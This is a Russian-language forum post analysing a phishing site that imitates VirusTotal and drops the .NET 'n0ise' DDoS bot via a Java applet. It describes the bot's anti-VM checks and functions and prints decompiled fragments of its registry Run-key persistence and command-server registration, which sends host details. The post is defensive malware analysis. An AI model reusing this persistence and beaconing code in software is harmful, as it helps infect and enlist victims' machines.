Привет. Читая твитер, наткнулся на ссылку с форума malwaredomainlist. В топике рассказывалось о спаме с ссылкой на якобы новый virustotal - http://new-virustotal.tk Стало любопытно, что там. Зайдя на указанный сайт видим визуальную копию оригинала В исходном коде фрейм: Переходим на сайт, указанный в сорце, визуально все то же самое, в сорцах копия оригинального сайта, а вот несколько строчек в конце: намекают на то, что грузится вредоносный ява-апплет, который в свою очередь выгружает некий файл bot.exe. Получаем мы в итоге файл, дропнутый в c:\Documents and Settings\[ИМЯ ЮЗЕРА]\bot.exe, весом в 102 кбайта, написанный на .NET. Что же это за файл? Вирустотал говорит следующее: http://www.virustotal.com/file-scan...33381bb0cd8afa4d348f2503fa071da1be-1306096763 Раз мы столкнулись с .NET, то стоит засунуть в декомпилятор. Что мы видим? Это известный n0ise ddos bot. Бинарник обвешан кучей анти-реверсерских функций: Бот собирает инфу о системе, и если обнаруживает, что запущен на виртуалке, то процесс убивается. Запись в автозапуск: PHP: Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).SetValue(cMain.ConfigClass.sRegName[0], '"' + cMain.ConfigClass.sFilePath[0] + '"'); Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).SetValue(cMain.ConfigClass.sRegName[1], '"' + cMain.ConfigClass.sFilePath[1] + '"'); Так бот регистрируется в админке: PHP: private void registerCCServer() { string parameters = "mode=0&hwid=" + cMain.ConfigClass.sHWID + "&botver=" + cMain.ConfigClass.sBotVersion + "&pcname=" + cMain.ConfigClass.sPCName + "&winver=" + cMain.ConfigClass.sWinVersion; В фукционал бота входят: ДДоС разных типов Самоликвидация бота Апдейт бота Посещение сайтов. А вот и адрес админки в строках: В общем-то все. На данный момент домен уже умер, обузы были отправлены хостеру, регистратору. Демонстрацию анализа мождно посмотреть на ютубе. Видео долгое - 25 минут, качество не ахти, но кого интересует анализ файлов - советую посмотреть. http://www.youtube.com/watch?v=9J_5EPzs_hs (с)Onthar. При копировании не забывайте поставить ссылку на оригинальный топик.